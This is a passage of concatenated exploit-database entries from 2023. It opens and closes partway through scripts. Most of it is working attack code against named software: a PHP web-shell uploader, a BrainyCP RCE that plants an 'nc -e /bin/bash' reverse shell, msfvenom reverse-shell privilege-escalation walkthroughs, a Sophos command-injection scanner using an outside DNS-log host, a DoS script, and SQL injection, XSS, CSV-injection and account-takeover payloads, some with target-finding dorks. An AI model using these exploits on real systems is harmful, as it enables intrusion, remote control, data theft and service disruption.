content = "<?php system($_GET['cmd'])?>"
response = uploadFile(url, filename, content)
if response.status_code != 200:
print(f"[File Upload] Got status code {response.status_code}. Expected 200.")
uploadedUrl = getUploadedFileUrl(url, filename)
if uploadedUrl == None:
print("Error. Could not find the uploaded file.")
exit(1)
print(f"Uploaded file is at {uploadedUrl}")
try:
interactiveShell(uploadedUrl)
except KeyboardInterrupt:
pass
print("\nQuitting.")
def getWebsiteURL(url: str):
if not url.startswith("http"):
url = "http://" + url
if url.endswith("/"):
url = url[:-1]
return url
def main():
parser = ArgumentParser(description="Exploit for CVE-2023-1826")
parser.add_argument("url", type=str, help="The url to the application's installation. Example: http://mysite:8080/php-ocls/")
args = parser.parse_args()
url = getWebsiteURL(args.url)
exploit(url)
if __name__ == "__main__":
main()
#!/bin/bash
# Exploit Title: Paradox Security Systems IPR512 - Denial Of Service
# Google Dork: intitle:"ipr512 * - login screen"
# Date: 09-APR-2023
# Exploit Author: Giorgi Dograshvili
# Vendor Homepage: Paradox - Headquarters <https://www.paradox.com/Products/default.asp?PID=423> (https://www.paradox.com/Products/default.asp?PID=423)
# Version: IPR512
# CVE : CVE-2023-24709
# Function to display banner message
display_banner() {
echo "******************************************************"
echo "* *"
echo "* PoC CVE-2023-24709 *"
echo "* BE AWARE!!! RUNNING THE SCRIPT WILL MAKE *"
echo "* A DAMAGING IMPACT ON THE SERVICE FUNCTIONING! *"
echo "* by SlashXzerozero *"
echo "* *"
echo "******************************************************"
}
# Call the function to display the banner
display_banner
echo ""
echo ""
echo "Please enter a domain name or IP address with or without port"
read -p "(e.g. example.net or 192.168.12.34, or 192.168.56.78:999): " domain
# Step 2: Ask for user confirmation
read -p "This will DAMAGE the service. Do you still want it to proceed? (Y/n): " confirm
if [[ $confirm == "Y" || $confirm == "y" ]]; then
# Display loading animation
animation=("|" "/" "-" "\\")
index=0
while [[ $index -lt 10 ]]; do
echo -ne "Loading ${animation[index]} \r"
sleep 1
index=$((index + 1))
done
# Use curl to send HTTP GET request with custom headers and timeout
response=$(curl -i -s -k -X GET \
-H "Host: $domain" \
-H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.111 Safari/537.36" \
-H "Accept: */" \
-H "Referer: http://$domain/login.html" \
-H "Accept-Encoding: gzip, deflate" \
-H "Accept-Language: en-US,en;q=0.9" \
-H "Connection: close" \
--max-time 10 \
"http://$domain/login.cgi?log_user=%3c%2f%73%63%72%69%70%74%3e&log_passmd5=&r=3982")
# Check response for HTTP status code 200 and print result
if [[ $response == *"HTTP/1.1 200 OK"* ]]; then
echo -e "\nIt seems to be vulnerable! Please check the webpanel: http://$domain/login.html"
else
echo -e "\nShouldn't be vulnerable! Please check the webpanel: http://$domain/login.html"
fi
else
echo "The script is stopped!."
fi
## Title: Microsoft-Edge-(Chromium-based)-Webview2-1.0.1661.34-Spoofing-Vulnerability
## Author: nu11secur1ty
## Date: 04.10.2023
## Vendor: https://developer.microsoft.com/en-us/
## Software: https://developer.microsoft.com/en-us/microsoft-edge/webview2/
## Reference: https://www.rapid7.com/fundamentals/spoofing-attacks/
## CVE ID: CVE-2023-24892
## Description:
The Webview2 development platform is vulnerable to Spoofing attacks.
The attacker can build a very malicious web app and spread it to the
victim's networks.
and when they open it this can be the last web app opening for them.
STATUS: HIGH Vulnerability
[+]Exploit:
[href](https://github.com/nu11secur1ty/Windows11Exploits/tree/main/2023/CVE-2023-24892/PoC)
## Reproduce:
[href](https://github.com/nu11secur1ty/Windows11Exploits/tree/main/2023/CVE-2023-24892)
## Proof and Exploit:
[href](https://streamable.com/uk7l2n)
## Time spend:
03:00:00
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at
https://packetstormsecurity.com/https://cve.mitre.org/index.html and
https://www.exploit-db.com/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>
# Exploit Title: BrainyCP V1.0 - Remote Code Execution
# Date: 2023-04-03
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://brainycp.io
# Demo: https://demo.brainycp.io
# Tested on: Kali Linux
# CVE : N/A
import requests
# credentials
url = input("URL: ")
username = input("Username: ")
password = input("Password: ")
ip = input("IP: ")
port = input("Port: ")
# login
session = requests.Session()
login_url = f"{url}/auth.php"
login_data = {"login": username, "password": password, "lan": "/"}
response = session.post(login_url, data=login_data)
if "Sign In" in response.text:
print("[-] Wrong credentials or may the system patched.")
exit()
# reverse shell
reverse_shell = f"nc {ip} {port} -e /bin/bash"
# request
add_cron_url = f"{url}/index.php?do=crontab&subdo=ajax&subaction=addcron"
add_cron_data = {
"cron_freq_minutes": "*",
"cron_freq_minutes_own": "",
"cron_freq_hours": "*",
"cron_freq_hours_own": "",
"cron_freq_days": "*",
"cron_freq_days_own": "",
"cron_freq_months": "*",
"cron_freq_weekdays": "*",
"cron_command": reverse_shell,
"cron_user": username,
}
response = session.post(add_cron_url, data=add_cron_data)
print("[+] Check your listener!")
## Exploit Title: Bludit 4.0.0-rc-2 - Account takeover
## Author: nu11secur1ty
## Date: 04.11.2013
## Vendor: https://www.bludit.com/
## Software: https://github.com/bludit/bludit/releases/tag/4.0.0-rc-2
## Reference: https://www.cloudflare.com/learning/access-management/account-takeover/
## Reference: https://portswigger.net/daily-swig/facebook-account-takeover-researcher-scoops-40k-bug-bounty-for-chained-exploit
## Description:
The already authenticated attacker can send a normal request to change
his password and then he can use
the same JSON `object` and the vulnerable `API token KEY` in the same
request to change the admin account password.
Then he can access the admin account and he can do very malicious stuff.
STATUS: HIGH Vulnerability
[+]Exploit:
```PUT
PUT /api/users/admin HTTP/1.1
Host: 127.0.0.1:8000
Content-Length: 138
sec-ch-ua: "Not:A-Brand";v="99", "Chromium";v="112"
sec-ch-ua-platform: "Windows"
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.50
Safari/537.36
content-type: application/json
Accept: */*
Origin: http://127.0.0.1:8000
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://127.0.0.1:8000/admin/edit-user/pwned
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: BLUDIT-KEY=98t31p2g0i7t6rscufuccpthui
Connection: close
{"token":"4f8df9f64e84fa4562ec3a604bf7985c","authentication":"6d1a5510a53f9d89325b0cd56a2855a9","username":"pwned","password":"password1"}
```
[+]Response:
```HTTP
HTTP/1.1 200 OK
Host: 127.0.0.1:8000
Date: Tue, 11 Apr 2023 08:33:51 GMT
Connection: close
X-Powered-By: PHP/7.4.30
Access-Control-Allow-Origin: *
Content-Type: application/json
{"status":"0","message":"User edited.","data":{"key":"admin"}}
```
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/bludit/2023/Bludit-v4.0.0-Release-candidate-2)
## Proof and Exploit:
[href](https://streamable.com/w3aa4d)
## Time spend:
00:57:00
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.htmlhttps://cxsecurity.com/ and
https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html
https://cxsecurity.com/ and https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>
# Exploit Title: Multi-Vendor Online Groceries Management System 1.0 - Remote Code Execution (RCE)
# Date: 4/23/2023
# Author: Or4nG.M4n
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/php/15166/multi-vendor-online-groceries-management-system-phpoop-free-source-code.html
# Version: 1.0
# Tested on: windows
#
# Vuln File : SystemSettings.php < here you can inject php code
# if(isset($_POST['content'])){
# foreach($_POST['content'] as $k => $v)
# file_put_contents("../{$k}.html",$v); <=== put any code into welcome.html or whatever you want
# }
# Vuln File : home.php < here you can include and execute you're php code
# <h3 class="text-center">Welcome</h3>
# <hr>
# <div class="welcome-content">
# <?php include("welcome.html") ?> <=== include
# </div>
import requests
url = input("Enter url :")
postdata = {'content[welcome]':'<?php if(isset($_REQUEST[\'cmd\'])){ echo "<pre>"; $cmd = ($_REQUEST[\'cmd\']); system($cmd); echo "</pre>"; die; }?>'}
resp = requests.post(url+"/classes/SystemSettings.php?f=update_settings", postdata)
print("[+] injection in welcome page")
print("[+]"+url+"/?cmd=ls -al")
print("\n")
# Exploit Title: Mars Stealer 8.3 - Admin Account Takeover
# Product: Mars Stelaer
# Technology: PHP
# Version: < 8.3
# Google Dork: N/A
# Date: 20.04.2023
# Tested on: Linux
# Author: Sköll - twitter.com/s_k_o_l_l
import argparse
import requests
parser = argparse.ArgumentParser(description='Mars Stealer Account Takeover Exploit')
parser.add_argument('-u', '--url', required=True, help='Example: python3 exploit.py -u http://localhost/')
args = parser.parse_args()
url = args.url.rstrip('/') + '/includes/settingsactions.php'
headers = {"Accept": "application/json, text/javascript, */*; q=0.01", "X-Requested-With": "XMLHttpRequest", "User-Agent": "Sköll", "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", "Origin": url, "Referer": url, "Accept-Encoding": "gzip, deflate", "Accept-Language": "en-US;q=0.8,en;q=0.7"}
data = {"func": "savepwd", "pwd": "sköll"} #change password
response = requests.post(url, headers=headers, data=data)
if response.status_code == 200:
print("Succesfull!")
print("New Password: " + data["pwd"])
else:
print("Exploit Failed!")
##########################################################################
# #
# Exploit Title: Arcsoft PhotoStudio 6.0.0.172 - Unquoted Service Path #
# Date: 2023/04/22 #
# Exploit Author: msd0pe #
# Vendor Homepage: https://www.arcsoft.com/ #
# My Github: https://github.com/msd0pe-1 #
# #
##########################################################################
Arcsoft PhotoStudio:
Versions =< 6.0.0.172 contains an unquoted service path which allows attackers to escalate privileges to the system level.
[1] Find the unquoted service path:
> wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """
ArcSoft Exchange Service ADExchange C:\Program Files (x86)\Common Files\ArcSoft\esinter\Bin\eservutil.exe Auto
[2] Get informations about the service:
> sc qc "ADExchange"
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: ADExchange
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 0 IGNORE
BINARY_PATH_NAME : C:\Program Files (x86)\Common Files\ArcSoft\esinter\Bin\eservutil.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : ArcSoft Exchange Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
[3] Generate a reverse shell:
> msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.101 LPORT=4444 -f exe -o Common.exe
[4] Upload the reverse shell to C:\Program Files (x86)\Common.exe
> put Commom.exe
> ls
drw-rw-rw- 0 Sun Apr 23 04:10:25 2023 .
drw-rw-rw- 0 Sun Apr 23 04:10:25 2023 ..
drw-rw-rw- 0 Sun Apr 23 03:55:37 2023 ArcSoft
drw-rw-rw- 0 Sun Apr 23 03:55:36 2023 Common Files
-rw-rw-rw- 7168 Sun Apr 23 04:10:25 2023 Common.exe
-rw-rw-rw- 174 Sun Jul 24 08:12:38 2022 desktop.ini
drw-rw-rw- 0 Sun Apr 23 03:55:36 2023 InstallShield Installation Information
drw-rw-rw- 0 Thu Jul 28 13:00:04 2022 Internet Explorer
drw-rw-rw- 0 Sun Jul 24 07:27:06 2022 Microsoft
drw-rw-rw- 0 Sun Jul 24 08:18:13 2022 Microsoft.NET
drw-rw-rw- 0 Sat Apr 22 05:48:20 2023 Windows Defender
drw-rw-rw- 0 Sat Apr 22 05:46:44 2023 Windows Mail
drw-rw-rw- 0 Thu Jul 28 13:00:04 2022 Windows Media Player
drw-rw-rw- 0 Sun Jul 24 08:18:13 2022 Windows Multimedia Platform
drw-rw-rw- 0 Sun Jul 24 08:18:13 2022 Windows NT
drw-rw-rw- 0 Fri Oct 28 05:25:41 2022 Windows Photo Viewer
drw-rw-rw- 0 Sun Jul 24 08:18:13 2022 Windows Portable Devices
drw-rw-rw- 0 Sun Jul 24 08:18:13 2022 Windows Sidebar
drw-rw-rw- 0 Sun Jul 24 08:18:13 2022 WindowsPowerShell
[5] Start listener
> nc -lvp 4444
[6] Reboot the service/server
> sc stop "ADExchange"
> sc start "ADExchange"
OR
> shutdown /r
[7] Enjoy !
192.168.1.102: inverse host lookup failed: Unknown host
connect to [192.168.1.101] from (UNKNOWN) [192.168.1.102] 51309
Microsoft Windows [Version 10.0.19045.2130]
(c) Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
nt authority\system
############################################################################
# #
# Exploit Title: Wondershare Filmora 12.2.9.2233 - Unquoted Service Path #
# Date: 2023/04/23 #
# Exploit Author: msd0pe #
# Vendor Homepage: https://www.wondershare.com #
# My Github: https://github.com/msd0pe-1 #
# #
############################################################################
Wondershare Filmora:
Versions =< 12.2.9.2233 contains an unquoted service path which allows attackers to escalate privileges to the system level.
[1] Find the unquoted service path:
> wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """
Wondershare Native Push Service NativePushService C:\Users\msd0pe\AppData\Local\Wondershare\Wondershare NativePush\WsNativePushService.exe Auto
[2] Get informations about the service:
> sc qc "NativePushService"
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: NativePushService
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Users\msd0pe\AppData\Local\Wondershare\Wondershare NativePush\WsNativePushService.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Wondershare Native Push Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
[3] Generate a reverse shell:
> msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.101 LPORT=4444 -f exe -o Wondershare.exe
[4] Upload the reverse shell to C:\Users\msd0pe\AppData\Local\Wondershare\Wondershare.exe
> put Wondershare.exe
> ls
drw-rw-rw- 0 Sun Apr 23 14:51:47 2023 .
drw-rw-rw- 0 Sun Apr 23 14:51:47 2023 ..
drw-rw-rw- 0 Sun Apr 23 14:36:26 2023 Wondershare Filmora Update
drw-rw-rw- 0 Sun Apr 23 14:37:13 2023 Wondershare NativePush
-rw-rw-rw- 7168 Sun Apr 23 14:51:47 2023 Wondershare.exe
drw-rw-rw- 0 Sun Apr 23 13:52:30 2023 WSHelper
[5] Start listener
> nc -lvp 4444
[6] Reboot the service/server
> sc stop "NativePushService"
> sc start "NativePushService"
OR
> shutdown /r
[7] Enjoy !
192.168.1.102: inverse host lookup failed: Unknown host
connect to [192.168.1.101] from (UNKNOWN) [192.168.1.102] 51309
Microsoft Windows [Version 10.0.19045.2130]
(c) Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
nt authority\system
#!/bin/bash
# Exploit Title: Sophos Web Appliance 4.3.10.4 - Pre-auth command injection
# Exploit Author: Behnam Abasi Vanda
# Vendor Homepage: https://www.sophos.com
# Version: Sophos Web Appliance older than version 4.3.10.4
# Tested on: Ubuntu
# CVE : CVE-2023-1671
# Shodan Dork: title:"Sophos Web Appliance"
# Reference : https://www.sophos.com/en-us/security-advisories/sophos-sa-20230404-swa-rce
# Reference : https://vulncheck.com/blog/cve-2023-1671-analysis
TARGET_LIST="$1"
# =====================
BOLD="\033[1m"
RED="\e[1;31m"
GREEN="\e[1;32m"
YELLOW="\e[1;33m"
BLUE="\e[1;34m"
NOR="\e[0m"
# ====================
get_new_subdomain()
{
cat MN.txt | grep 'YES' >/dev/null;ch=$?
if [ $ch -eq 0 ];then
echo -e " [+] Trying to get Subdomain $NOR"
rm -rf cookie.txt
sub=`curl -i -c cookie.txt -s -k -X $'GET' \
-H $'Host: www.dnslog.cn' -H $'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/112.0' -H $'Accept: */*' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Connection: close' -H $'Referer: http://www.dnslog.cn/' \
$'http://www.dnslog.cn/getdomain.php?t=0' | grep dnslog.cn`
echo -e " [+]$BOLD$GREEN Subdomain : $sub $NOR"
fi
}
check_vuln()
{
curl -k --trace-ascii % "https://$1/index.php?c=blocked&action=continue" -d "args_reason=filetypewarn&url=$RANDOM&filetype=$RANDOM&user=$RANDOM&user_encoded=$(echo -n "';ping $sub -c 3 #" | base64)"
req=`curl -i -s -k -b cookie.txt -X $'GET' \
-H $'Host: www.dnslog.cn' -H $'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/112.0' -H $'Accept: */*' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Connection: close' -H $'Referer: http://www.dnslog.cn/' \
$'http://www.dnslog.cn/getrecords.php?t=0'`
echo "$req" | grep 'dnslog.cn' >/dev/null;ch=$?
if [ $ch -eq 0 ];then
echo "YES" > MN.txt
echo -e " [+]$BOLD $RED https://$1 Vulnerable :D $NOR"
echo "https://$1" >> vulnerable.lst
else
echo -e " [-] https://$1 Not Vulnerable :| $NOR"
echo "NO" > MN.txt
fi
}
echo '
██████╗██╗ ██╗███████╗ ██████╗ ██████╗ ██████╗ ██████╗ ██╗ ██████╗███████╗
██╔════╝██║ ██║██╔════╝ ╚════██╗██╔═████╗╚════██╗╚════██╗ ███║██╔════╝╚════██║
██║ ██║ ██║█████╗█████╗ █████╔╝██║██╔██║ █████╔╝ █████╔╝█████╗╚██║███████╗ ██╔╝
██║ ╚██╗ ██╔╝██╔══╝╚════╝██╔═══╝ ████╔╝██║██╔═══╝ ╚═══██╗╚════╝ ██║██╔═══██╗ ██╔╝
╚██████╗ ╚████╔╝ ███████╗ ███████╗╚██████╔╝███████╗██████╔╝ ██║╚██████╔╝ ██║
╚═════╝ ╚═══╝ ╚══════╝ ╚══════╝ ╚═════╝ ╚══════╝╚═════╝ ╚═╝ ╚═════╝ ╚═╝
██████╗ ██╗ ██╗ ██████╗ ███████╗██╗ ██╗███╗ ██╗ █████╗ ███╗ ███╗ ██╗
██╔══██╗╚██╗ ██╔╝ ██╔══██╗██╔════╝██║ ██║████╗ ██║██╔══██╗████╗ ████║ ██╗╚██╗
██████╔╝ ╚████╔╝ ██████╔╝█████╗ ███████║██╔██╗ ██║███████║██╔████╔██║ ╚═╝ ██║
██╔══██╗ ╚██╔╝ ██╔══██╗██╔══╝ ██╔══██║██║╚██╗██║██╔══██║██║╚██╔╝██║ ▄█╗ ██║
██████╔╝ ██║ ██████╔╝███████╗██║ ██║██║ ╚████║██║ ██║██║ ╚═╝ ██║ ▀═╝██╔╝
╚═════╝ ╚═╝ ╚═════╝ ╚══════╝╚═╝ ╚═╝╚═╝ ╚═══╝╚═╝ ╚═╝╚═╝ ╚═╝ ╚═╝
'
if test "$#" -ne 1; then
echo " ----------------------------------------------------------------"
echo " [!] please give the target list file : bash CVE-2023-1671.sh targets.txt "
echo " ---------------------------------------------------------------"
exit
fi
rm -rf cookie.txt
echo "YES" > MN.txt
for target in `cat $TARGET_LIST`
do
get_new_subdomain;
echo " [~] Checking $target"
check_vuln "$target"
done
rm -rf MN.txt
rm -rf cookie.txt
Exploit Title: projectSend r1605 - Private file download
Application: projectSend
Version: r1605
Bugs: IDOR
Technology: PHP
Vendor URL: https://www.projectsend.org/
Software Link: https://www.projectsend.org/
Date of found: 24-01-2023
Author: Mirabbas Ağalarov
Tested on: Linux
Technical Details & POC
========================================
1.Access to private files of any user, including admin
just change id
GET /process.php?do=download&id=[any user's private pictures id] HTTP/1.1
Host: localhost
sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/manage-files.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: download_started=false; PHPSESSID=e46dtgmf95uu0usnceebfqbp0f
Connection: close
# Exploit Title: PHP Restaurants 1.0 - SQLi Authentication Bypass & Cross Site Scripting (XSS)
# Google Dork: None
# Date: 4/26/2023
# Exploit Author: Or4nG.M4n
# Vendor Homepage: https://github.com/jcwebhole
# Software Link: https://github.com/jcwebhole/php_restaurants
# Version: 1.0
functions.php
function login(){
global $conn;
$email = $_POST['email'];
$pw = $_POST['password'];
$sql = "SELECT * FROM `users` WHERE `email` = '".$email."' AND `password` =
'".md5($pw)."'"; <-- there is No filter to secure sql query
parm[email][password]
$result = $conn->query($sql);
if ($result->num_rows > 0) {
while($row = $result->fetch_assoc()) {
setcookie('uid', $row['id'], time() + (86400 * 30), "/"); // 86400 = 1 day
header('location: index.php');
}
} else {
header('location: login.php?m=Wrong Password');
}
}
login bypass at admin page /rest1/admin/login.php
email & password : ' OR 1=1 -- <- add [space] end of the payload
cross site scripting main page /index.php
xhttp.open("GET", "functions.php?f=getRestaurants<?php
if(isset($_GET['search'])) echo '&search='.$_GET['search']; <-- here we
can insert our xss payload
?>
", true);
xhttp.send();
</script> <-- when you insert your'e payload don't forget to add </script>
like
xss payload : </script><img onerror=alert(1) src=a>
Exploit Title: phpMyFAQ v3.1.12 - CSV Injection
Application: phpMyFAQ
Version: 3.1.12
Bugs: CSV Injection
Technology: PHP
Vendor URL: https://www.phpmyfaq.de/
Software Link: https://download.phpmyfaq.de/phpMyFAQ-3.1.12.zip
Date of found: 21.04.2023
Author: Mirabbas Ağalarov
Tested on: Windows
2. Technical Details & POC
========================================
Step 1. login as user
step 2. Go to user control panel and change name as =calc|a!z| and save
step 3. If admin Export users as CSV ,in The computer of admin occurs csv injection and will open calculator
payload: calc|a!z|
Poc video: https://youtu.be/lXwaexX-1uU
Exploit Title: admidio v4.2.5 - CSV Injection
Application: admidio
Version: 4.2.5
Bugs: CSV Injection
Technology: PHP
Vendor URL: https://www.admidio.org/
Software Link: https://www.admidio.org/download.php
Date of found: 26.04.2023
Author: Mirabbas Ağalarov
Tested on: Windows
2. Technical Details & POC
========================================
Step 1. login as user
step 2. Go to My profile (edit profile) and set postal code as =calc|a!z| and save (http://localhost/admidio/adm_program/modules/profile/profile_new.php?user_uuid=4b060d07-4e63-429c-a6b7-fc55325e92a2)
step 3. If admin Export users as CSV or excell file ,in The computer of admin occurs csv injection and will open calculator (http://localhost/admidio/adm_program/modules/groups-roles/lists_show.php?rol_ids=2)
payload: =calc|a!z|
Poc video: https://www.youtube.com/watch?v=iygwj1izSMQ
Exploit Title: revive-adserver v5.4.1 - Cross-Site Scripting (XSS)
Application: revive-adserver
Version: 5.4.1
Bugs: XSS
Technology: PHP
Vendor URL: https://www.revive-adserver.com/
Software Link: https://www.revive-adserver.com/download/
Date of found: 31-03-2023
Author: Mirabbas Ağalarov
Tested on: Linux
2. Technical Details & POC
========================================
steps:
1. Go to create banner
2. select the advanced section
3. Write this payload in the prepend and append parameters (%3Cscript%3Ealert%281%29%3C%2Fscript%3E)
POST /www/admin/banner-advanced.php HTTP/1.1
Host: localhost
Content-Length: 213
Cache-Control: max-age=0
sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/www/admin/banner-advanced.php?clientid=3&campaignid=2&bannerid=2
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: sessionID=5224583cf474cd32d2ef37171c4d7894
Connection: close
clientid=3&campaignid=2&bannerid=2&token=94c97eabe1ada8e7ae8f204e2ebf7180&prepend=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&append=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&submitbutton=De%C4%9Fi%C5%9Fiklikleri+Kaydet
We are sending this link to the admin. then if admin clicks it will be exposed to xss
http://localhost/www/admin/banner-advanced.php?clientid=3&campaignid=2&bannerid=2
# Exploit Title: SoftExpert (SE) Suite v2.1.3 - Local File Inclusion
# Date: 27-04-2023
# Exploit Author: Felipe Alcantara (Filiplain)
# Vendor Homepage: https://www.softexpert.com/
# Version: 2.0 < 2.1.3
# Tested on: Kali Linux
# CVE : CVE-2023-30330
# SE Suite versions tested: 2.0.15.31, 2.0.15.115
# https://github.com/Filiplain/LFI-to-RCE-SE-Suite-2.0
# https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-30330
#!/bin/bash
# Usage: ./lfi-poc.sh <domain> <username> <password> <File Path>
target=$1
u=$2
p=$3
file=$(echo -n "$4"|base64 -w 0)
end="\033[0m\e[0m"
red="\e[0;31m\033[1m"
blue="\e[0;34m\033[1m"
echo -e "\n$4 : $file\n"
echo -e "${blue}\nGETTING SESSION COOKIE${end}"
cookie=$(curl -i -s -k -X $'POST' \
-H "Host: $target" -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0' -H $'Accept: */*' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H $'X-Requested-With: XMLHttpRequest' -H $'Content-Length: 213' -H "Origin: https://$target" -H "Referer: https://$target/softexpert/login?page=home" -H $'Sec-Fetch-Dest: empty' -H $'Sec-Fetch-Mode: cors' -H $'Sec-Fetch-Site: same-origin' -H $'Te: trailers' -H $'Connection: close' \
-b $'language=1; _ga=GA1.3.151610227.1675447324; SEFGLANGUAGE=1; mode=deploy' \
--data-binary "json=%7B%22AuthenticationParameter%22%3A%7B%22language%22%3A3%2C%22hashGUID%22%3Anull%2C%22domain%22%3A%22%22%2C%22accessType%22%3A%22DESKTOP%22%2C%22login%22%3A%22$u%22%2C%22password%22%3A%22$p%22%7D%7D" \
"https://$target/softexpert/selogin"|grep se-authentication-token |grep "=" |cut -d ';' -f 1|sort -u|cut -d "=" -f 2)
echo "cookie: $cookie"
function LFI () {
curl -s -k -X $'POST' \
-H "Host: $target" -H "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0" -H "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8" -H 'Accept-Language: en-US,en;q=0.5' -H 'Accept-Encoding: gzip, deflate' -H 'Content-Type: application/x-www-form-urlencoded' -H "Origin: https://$target" -H "Referer: https://$target/softexpert/workspace?page=home" -H 'Upgrade-Insecure-Requests: 1' -H 'Sec-Fetch-Dest: document' -H 'Sec-Fetch-Mode: navigate' -H 'Sec-Fetch-Site: same-origin' -H 'Te: trailers' -H 'Connection: close' \
-b "se-authentication-token=$cookie; _ga=GA1.3.151610227.1675447324; SEFGLANGUAGE=1; mode=deploy" \
--data-binary "action=4&managerName=lol&managerPath=$file&className=ZG9jX2RvY3VtZW50X2FkdmFuY2VkX2dyb3VwX2ZpbHRlcg%3D%3D&instantiate=false&loadJquery=false" \
"https://$target/se/v42300/generic/gn_defaultframe/2.0/defaultframe_filter.php"
}
echo -e "${blue}\nExploiting LFI:${end}"
LFI
function logout () {
curl -i -s -k -X $'POST' \
-H "Host: $target" -H $'Content-Length: 0' -H $'Sec-Ch-Ua: \"Not_A Brand\";v=\"99\", \"Google Chrome\";v=\"109\", \"Chromium\";v=\"109\"' -H $'Accept: application/json, text/javascript, */*; q=0.01' -H $'X-Requested-With: XMLHttpRequest' -H $'Sec-Ch-Ua-Mobile: ?0' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36' -H $'Sec-Ch-Ua-Platform: \"Linux\"' -H "Origin: https://$target" -H $'Sec-Fetch-Site: same-origin' -H $'Sec-Fetch-Mode: cors' -H $'Sec-Fetch-Dest: empty' -H "Referer: https://$target/softexpert/workspace?page=home" -H $'Accept-Encoding: gzip, deflate' -H $'Accept-Language: en-US,en;q=0.9' -H $'Connection: close' \
